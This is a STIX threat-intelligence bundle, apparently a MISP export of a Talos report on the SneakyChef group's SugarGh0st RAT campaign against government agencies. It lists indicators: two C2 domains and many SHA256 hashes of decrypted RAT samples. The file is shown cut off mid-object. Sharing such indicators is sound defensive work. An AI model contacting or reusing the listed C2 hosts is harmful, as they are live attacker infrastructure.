sneakychef-sugargh0st-rat.json
{"type": "bundle", "spec_version": "2.0", "id": "bundle--08c3e63e-9aa6-411a-bc86-aaa1070ebf9e", "objects": [{"type": "identity", "id": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Talos", "identity_class": "organization"}, {"type": "report", "id": "report--6eeb61ba-a84b-4cfd-87d3-71fdde16ad60", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "SneakyChef espionage group targets government agencies with SugarGh0st and more infection techniques", "published": "2024-06-21T12:14:22Z", "object_refs": ["x-misp-attribute--fa29d227-810b-4a94-8810-4ed0ff30eb2d", "x-misp-attribute--a03a979b-54f4-440e-83c0-75e6fdb20908", "observed-data--fa734bd7-4e86-465f-910f-8039624d21a5", "indicator--90a3f897-a411-472a-8ccb-4be89e63fbee", "indicator--85944bef-3047-4ab0-8b90-7bf343b1b1c4", "indicator--c6fc3c6e-e3c2-4be4-9bd0-c2ea19c7d0a5", "indicator--9bb4ecb3-ccd5-439d-b3dc-a676e2b9047e", "indicator--81787075-cbb7-4c8d-8305-ce1231185c05", "indicator--ce232965-28e9-4976-b63c-cb296f8cb901", "indicator--59737122-b996-4d25-8e50-57eff4c4fe0a", "indicator--ab4b9974-fc10-42b6-8cb7-5dcff4051ff4", "indicator--c902baa7-0bb1-42a9-89a0-4a6db30217cd", "indicator--63250d7d-5941-47ce-be31-98699d816e39", "indicator--9d657512-769b-4c74-8e0b-af3f4830a29c", "indicator--0131e162-9214-42de-bdcf-907e922feee2", "indicator--fe7a09ef-3a50-4903-9eb0-90b6de646f0e", "indicator--1e8efbf9-7c6a-4500-826b-e29770b72f72", "indicator--9612c667-4d11-4b4e-8f5b-b313ab138239", "indicator--477d64e4-beec-4048-a27e-aa3b99f1b2a9", "indicator--e445c52c-f0ba-49a0-a1de-ddddbb34c179", "indicator--b5210c5d-ac6a-4bf7-a158-eb0202304cce", "indicator--abd6b393-e2dc-4134-b411-56bff0c7ee69", "indicator--d865fce0-4fc1-4941-9dc8-b55b8ae1d935", "indicator--b563a12f-1e77-40c1-ad3e-0b55b86c648d", "indicator--89ef98be-def5-44f2-97a6-36fb444e5064", 
"indicator--b649af0d-963b-41f8-8984-d433ed8b9c4a", "indicator--59ddd88a-2ab5-4ad9-80a4-8b57c5d109b5", "indicator--b4a5814d-0c8a-4a87-a0f6-fa0e4b0a66a6", "indicator--d0956779-bd6f-440b-b146-d5cc781b2872", "indicator--9ce3a1bd-6677-49fc-bba0-cd7a98f7e1eb", "indicator--59057bf3-6220-4a96-ac49-458f2cad116d", "indicator--365ab122-e71d-4f97-a8b6-bd5036e035f7", "indicator--453439ce-14e4-48b1-bd22-b62fcfaa47da", "indicator--7cc6f2dd-8f4b-4915-bde7-3b23e8d9cd6f", "indicator--04fd3bb3-c9d7-48de-9dc8-ff6f18267231", "indicator--fd1e017e-a36c-4f32-ba13-54c5c999b98b", "indicator--fa5acfb5-1e1c-4015-a964-1d68014d3fe9", "indicator--8b95b4ba-0720-4cdd-86b2-f1c6873ca8f4", "indicator--183b298f-964e-4113-8165-d2e18c3f8ce8", "indicator--0eed57e1-b6d0-4ee5-836b-d4e253ca28f3", "indicator--4561be59-ef13-4b99-9df8-5e0721954a6e", "indicator--76a0b7e6-fe95-47ac-99e0-d0feeb8f1e04", "indicator--9f06f98b-9e9d-4da8-9d03-5c87e332919f", "indicator--eef5e602-f8af-478b-b078-2c43d71cf09f", "indicator--294b1a5e-80ab-4aa0-adff-84f7ccff7d42", "indicator--004d5974-3799-4235-8d6a-2e18e7b3af66", "indicator--337a442e-4495-4067-ae2e-9d92564018c8", "indicator--22f5e4ca-294c-483d-9a64-8c40f8a44865", "indicator--50a1b683-26e1-46e2-b28e-9dc26cefd8e9", "indicator--97bcc14e-c7ea-4ecb-a6a3-507cac3e0a89", "indicator--9de1c1fe-4740-4aa3-95eb-56e2a7d44bb8", "indicator--15a2c00a-b852-4b96-9b0b-5ad4e196492e", "indicator--fa17ca90-0d67-4384-ab75-98255c2e71c3", "indicator--58e0435b-6cd5-4a2d-b5c1-e1c03300c2d0", "indicator--3ac7bf41-0877-4a13-b7e3-ec834f73a576", "indicator--b9a2c24f-185e-4505-90d2-230cb0b052ee", "indicator--9802b013-445d-477a-adc3-e5072561fc7f", "indicator--14457179-5310-404c-82e4-13451899f4bf", "indicator--51677e36-30e1-4c18-9e35-110716d52dac", "indicator--dcdd5dc9-f60d-4b1a-b755-284eae3033ab", "indicator--3bc0c79d-41e1-4000-807d-d05290e5344c", "indicator--3e01d0e1-f8d8-479f-9d5f-2a57121b5b81", "indicator--68897ecf-1e90-428c-bc3d-d1434e66b7b9", "indicator--469403e9-ea50-4db3-8f22-da6747dc46d4", 
"indicator--555e14b3-2549-492f-9244-a94a4f1b12ac", "indicator--26c5b8d0-7437-40ce-ac7c-8da55c3ddbec", "indicator--c9727765-903d-4955-ac71-1e2d4d54de5c", "indicator--e89c5bed-5701-4689-a0b8-50bd69c27994", "indicator--e46033b3-57ad-4c0f-a867-d602de55d019", "indicator--8d021809-dc2d-4509-9e2c-493365ea1afc", "indicator--d5219c09-b2f1-4c23-8b1d-718ef6eccdd9", "indicator--93717411-b875-4675-8221-1ad4065ade3a", "indicator--99df17c8-febb-4b49-8ab2-da8e51bccb83", "indicator--a2abe63e-640d-4741-95a3-63ffe8ae170c", "indicator--c3f7aa63-d41c-4763-84c4-d8327fb80ad4", "indicator--52e26066-3aa6-477b-8bb9-48ebf9d10d84", "indicator--5d423281-c758-4dc8-bd1d-a59b6bde3b63", "indicator--59ac70c5-34e7-466f-a686-959e2bda5b8c", "indicator--a7a54017-989f-4729-a7de-58f11c46f35a", "indicator--789e13a5-c534-4aa0-87ad-22c9d436c9b8", "indicator--fe29b845-1b6c-4fd5-92cf-660c1908ef11", "indicator--f25385ef-e065-42dc-8a63-0517c352f28a", "indicator--3aa88adf-d56b-4ce9-9d48-3d4e9440bff7", "indicator--68baf0be-5855-4540-ba40-065119dad0c0", "indicator--6b296be4-3e6f-40fd-a449-7681141df090", "indicator--977a76ea-ca17-43fe-a7ca-99b89a8d3982", "indicator--3ecffff1-414e-4bc9-94f2-56650b0cfaf5", "indicator--bc044436-e162-43e9-bd85-d5505ec006e2", "indicator--68574461-cd05-4934-8248-f4d40f36f1a6", "indicator--07b6cb8e-3e1c-469e-9709-602aaac1faf7", "indicator--997b6c33-fa08-44aa-b395-d1de793a998e", "indicator--9a44f194-35dd-448f-93c2-487c57e749af", "indicator--7d175867-b502-4d40-ad5a-5a3788eea7fc", "indicator--ed9084b6-c33c-4dce-b107-4603fff35966", "indicator--a8c429c2-ef1a-4f74-8d72-10bb5e7210b0", "indicator--89479bdf-bf86-49f5-a969-748f027dba61", "indicator--126aafdd-72f0-4504-89c7-b90116dfc292", "indicator--a7b2209d-aba8-416f-9ac0-e288db94a9ee", "indicator--6523bb7c-2bd5-4574-947e-6816950dd159", "indicator--959144ec-707c-44f3-a92d-452269b0659b", "indicator--31cc7055-d867-4912-aa55-1d34d60562ba", "indicator--88032f64-0a3a-468a-b20f-e67fd5972b62", "indicator--6ee2deb3-c786-4338-af18-3e88efe32b67", 
"indicator--d5d14874-da5c-41e7-b34c-865cff787ce9", "indicator--942c6dab-ec03-4a4e-b67f-7670d140f344", "indicator--92124619-f4a4-4944-a23a-1e03b6eea724", "indicator--5cf81593-976c-432d-be3d-a81bbe050c96", "indicator--7afd12ad-b68d-4719-b735-716351d822b8", "indicator--4ea64b7c-4b70-4d7d-9659-2ca422c9e406", "indicator--a6f4314b-f37e-42fa-a6a6-a9b453052f91", "indicator--26606ab3-6101-44d4-9da1-b3d924fae337", "indicator--aa71e0e1-5235-4c45-be95-c23d8e0e292f", "indicator--5f47370a-c025-4e1d-946d-45184c0ee928", "indicator--973c2dfb-4f4e-4c29-b699-cd32b838913a", "indicator--5ac26f12-ebf6-4a79-9b3a-461a61fd0336", "indicator--a8b9e47f-9f86-466a-a680-3f7b7d9b54ec", "indicator--616aa340-4ff5-4e9f-9d2a-402b2c0d208b", "indicator--5b9787cf-0a5d-47f4-933e-4b9cf044e232", "indicator--1ca57c2b-8e4a-42ed-bafa-a106cbbc363d", "indicator--21caa1eb-3474-417d-b840-ee0290dc3383", "indicator--a3e537e4-aa48-42e0-bcce-389268fc9af0", "indicator--c889a5a6-fbdb-4441-8e6e-d8c66199a6fb", "indicator--d59829f8-181f-4c85-9513-0320e8e21465", "indicator--8f09eac1-5551-4cac-afa0-01a41231978c", "indicator--0da12927-e943-4516-adae-5cb9ebfe973d", "indicator--f4ca19a5-b5fe-45f0-9143-83d0523c85e1", "indicator--e154a8ca-fcee-476b-99fd-199fb4e61a19", "indicator--79f280de-ff3f-4c56-9304-1c8a2bc6cbf4", "indicator--4bcdb3e1-88f1-4d97-a0ff-23b6e1a99bab", "indicator--7f49d4ab-f033-46bb-8668-fd7daea19462", "indicator--8e63f46b-17ee-432f-8bc3-87be9ad97efc", "indicator--7e9d47dd-6767-41a1-8300-651eda509db4", "indicator--9de2a8bf-23a0-456b-892f-0234cde7c773", "indicator--939b4f00-05ad-4620-8d3a-c61effe72dcf", "indicator--f886350c-1d12-4c20-981c-f195ab5bcfb0", "indicator--f2733d9c-de03-485e-8b2e-65e69d176dc6", "indicator--868385b2-a38d-4645-97ac-e64ca0da2c68", "indicator--a67ffa6e-0aee-4a2a-8741-46edcecd0da9", "indicator--3921e712-ec5e-4454-baea-67035fb2efed", "indicator--5d0a2c88-9adb-4a0c-9547-40567fc76c77", "indicator--eca477c7-0d4e-4d45-958b-cf7be7d50d1e", "indicator--715bc095-4974-4715-b8cd-57d2db13a770", 
"indicator--05993e61-45ea-40ce-a35b-c08e71a15c57", "indicator--e2e2604e-7060-4b45-9077-7c80e9a15fc3", "indicator--d75eb593-345e-4a8b-8c64-5a53d4fda34d", "indicator--2ce951e8-c41d-45dd-a553-e477f81aa2c3", "indicator--4d033fe2-b1b7-417a-8955-c26dc1884ddb", "indicator--98264004-0cd9-4add-9af5-d6647e55d32e", "indicator--f2fcfa1d-0b52-4afb-a7f5-2fd680815c66", "indicator--0457bee4-2e48-4d33-9e76-8c8772a073a6", "indicator--49fc12e2-76da-4892-95a9-dd6f73604892", "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", "attack-pattern--a93ccb8f-3996-42e2-b7c7-bb599d4e205f", "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "attack-pattern--241814ae-de3f-4656-b49e-f9a80764d4b7", "attack-pattern--7fd87010-3a00-4da3-b905-410525e8ec44", "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5", "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b"], "labels": ["Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "Talos_Intel_Blog", "tlp:clear", "Remote Access Trojan"]}, {"type": "x-misp-attribute", "id": "x-misp-attribute--fa29d227-810b-4a94-8810-4ed0ff30eb2d", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T07:55:58.000Z", "modified": "2024-06-19T07:55:58.000Z", "labels": ["misp:type=\"threat-actor\"", "misp:category=\"Attribution\""], "x_misp_category": "Attribution", "x_misp_comment": "Threat actor SneakyChef", "x_misp_type": "threat-actor", "x_misp_value": "SneakyChef"}, {"type": "x-misp-attribute", "id": "x-misp-attribute--a03a979b-54f4-440e-83c0-75e6fdb20908", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T07:56:55.000Z", "modified": 
"2024-06-19T07:56:55.000Z", "labels": ["misp:type=\"text\"", "misp:category=\"Payload type\""], "x_misp_category": "Payload type", "x_misp_type": "text", "x_misp_value": "SugarGh0st\r\nSpiceRAT"}, {"type": "observed-data", "id": "observed-data--fa734bd7-4e86-465f-910f-8039624d21a5", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T07:58:15.000Z", "modified": "2024-06-19T07:58:15.000Z", "first_observed": "2024-06-19T07:58:15Z", "last_observed": "2024-06-19T07:58:15Z", "number_observed": 1, "objects": {"0": {"type": "url", "value": "https://blog.talosintelligence.com/sneakychef-sugargh0st-rat/"}}, "labels": ["misp:type=\"url\"", "misp:category=\"External analysis\""]}, {"type": "indicator", "id": "indicator--90a3f897-a411-472a-8ccb-4be89e63fbee", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "C2", "pattern": "[domain-name:value = 'account.drive-google-com.tk']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Network activity"}], "labels": ["misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--85944bef-3047-4ab0-8b90-7bf343b1b1c4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "C2", "pattern": "[domain-name:value = 'account.gommask.online']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Network activity"}], "labels": ["misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--c6fc3c6e-e3c2-4be4-9bd0-c2ea19c7d0a5", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", 
"modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '8a563b3091b56eb0562f5442c90b4d28d4be2946a3dc4a225b4b96134f7e447b']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9bb4ecb3-ccd5-439d-b3dc-a676e2b9047e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'd6bffa45aa2448b2fb584713395b742e02ef77c1d54f125cd501240e0dd91a13']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--81787075-cbb7-4c8d-8305-ce1231185c05", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '951a54d2c61c3257447c4ff5fd451ee581c76d3d4d88fa482b99f5410d7b7b6f']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--ce232965-28e9-4976-b63c-cb296f8cb901", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 
'8db5a7efe1a83e43cb4acdc596b0413b4beb54f9f8e13f978c07a6eeee6b8435']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--59737122-b996-4d25-8e50-57eff4c4fe0a", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '31b7e97770ffe74dad914a37a78c8f9a7286c75b62b5fae1c4ec722837ad457e']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--ab4b9974-fc10-42b6-8cb7-5dcff4051ff4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'e56537d09156bb77f4821d5ce005c7840ec41890de233d88a1152f68110098cf']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--c902baa7-0bb1-42a9-89a0-4a6db30217cd", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '06056f83e93849124dc435166c1b463bf34bbf99ea5671221ddaf6641e3db4f4']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": 
"Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--63250d7d-5941-47ce-be31-98699d816e39", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '81ded17e368abc280db4d9f83fb0aebe1ec58eb7e4103f98f0fb5269c8696551']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9d657512-769b-4c74-8e0b-af3f4830a29c", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '8190e8990bb7bc860691ce2d3ff6015d7f9a0339e77aa7c6e5e3ae5209bd6f4c']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--0131e162-9214-42de-bdcf-907e922feee2", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '727bcb28eb0282a389bd2c82e3fac57a9c348aedee23d18c8d136bbd8803b642']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": 
"indicator--fe7a09ef-3a50-4903-9eb0-90b6de646f0e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '0b6dcf9ba14096c631bd9a3f90180c5f6ad9177a8283724146425b2f08b53e02']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--1e8efbf9-7c6a-4500-826b-e29770b72f72", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '653c3ea0ce07880ffe3a2acd735770cc2cbedb137cb5a29d4b059af5a569f98f']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9612c667-4d11-4b4e-8f5b-b313ab138239", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '2547f1a874c552da17abf6d5f88e626ed4bda71ca0bb39b2bc13b2d748a05409']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--477d64e4-beec-4048-a27e-aa3b99f1b2a9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": 
"2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '4b1f3cc69e905137263ec8c39bbdcbccd5e33c3abffe54d77de847a998fcf17a']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--e445c52c-f0ba-49a0-a1de-ddddbb34c179", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '48cc1d2df6ea2a04201e74ce59983a0bf0964d59a0e5c5647068b653a0ec66d5']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--b5210c5d-ac6a-4bf7-a158-eb0202304cce", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '05758a568e30b3f35092b8d43bf4f29a3e5e9b988dc541d51fc8233ebbec2874']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--abd6b393-e2dc-4134-b411-56bff0c7ee69", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = 'a22e16fad2d88de1a625201408b2262d8335bef3d944f4f696ad825973af124d']", 
"valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--d865fce0-4fc1-4941-9dc8-b55b8ae1d935", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '7684296728c10249f671cf80b58e04633031e1b74a88e8b4f7d31776fc643d10']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--b563a12f-1e77-40c1-ad3e-0b55b86c648d", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '375e0b117c7e45266e9544c23e226dd791ac32d094e60b858ff823577be43acb']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--89ef98be-def5-44f2-97a6-36fb444e5064", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '944cd95eaf496ad6dd8859032c4577ad6917dec3a4c300eeca762e08a97243f5']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", 
"misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--b649af0d-963b-41f8-8984-d433ed8b9c4a", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '6b327a15877528e5e5b0891fd587cb2fc932d94404c756401af628195eb94831']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--59ddd88a-2ab5-4ad9-80a4-8b57c5d109b5", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '8cd0026ba4f0c8984bdb6daaddb6fa17088e3b9272859cc2c03195d36f47f334']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--b4a5814d-0c8a-4a87-a0f6-fa0e4b0a66a6", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:17.000Z", "modified": "2024-06-19T08:09:17.000Z", "description": "Decrypted SugarGh0st RAT", "pattern": "[file:hashes.SHA256 = '06ac9bcbc1d026fbe9a261afe62a1b5704dc64b89a28dae47441fa6ef6230eb9']", "valid_from": "2024-06-19T08:09:17Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--d0956779-bd6f-440b-b146-d5cc781b2872", "created_by_ref": 
